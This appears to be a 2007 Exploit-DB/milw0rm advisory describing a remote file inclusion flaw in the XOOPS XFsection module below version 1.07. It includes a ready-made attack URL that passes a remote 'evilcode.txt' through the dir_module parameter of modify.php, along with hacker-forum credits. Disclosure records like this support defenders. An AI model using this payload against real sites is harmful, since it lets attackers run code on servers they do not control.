XOOPS Module XFsection Remote File Inclusion

vendor:

XFsection

by:

Sp[L]o1T

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: XFsection

Affected Version From: < 1.07

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

XOOPS Module XFsection Remote File Inclusion

The XOOPS Module XFsection version < 1.07 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by accessing the 'modify.php' file with a malicious 'dir_module' parameter, which allows them to include arbitrary remote files.

Mitigation:

Unknown

Source

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module XFsection Remote File Inclusion
version: < 1.07
source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Note:
In some cases you will need to be authenticated.

# milw0rm.com [2007-06-13]